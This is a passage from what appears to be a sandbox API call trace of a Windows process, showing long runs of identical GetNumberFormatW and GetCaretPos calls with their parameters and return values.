lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.638] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.639] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.640] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.641] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.641] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.641] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0037.641] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.170] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.171] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: 